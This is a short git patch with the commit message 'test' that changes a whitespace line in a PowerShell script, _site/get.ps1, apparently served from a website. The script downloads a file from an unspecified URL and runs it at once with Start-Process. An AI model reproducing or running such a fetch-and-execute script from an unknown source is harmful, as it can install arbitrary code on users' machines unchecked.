From 58f0a7ddcbd73926b4988e6c27e082aa837f393a Mon Sep 17 00:00:00 2001 From: "DESKTOP-RBH716R\\Admin" Date: Mon, 25 Jul 2022 22:56:19 +0530 Subject: [PATCH] test --- _site/get.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_site/get.ps1 b/_site/get.ps1 index ee77da8..b88d4f9 100644 --- a/_site/get.ps1 +++ b/_site/get.ps1 @@ -8,5 +8,5 @@ if($PSVersionTable.PSVersion.Major -lt 3){ }else { Invoke-WebRequest -Uri $DownloadURL -UseBasicParsing -OutFile $FilePath } - + Start-Process -FilePath $FilePath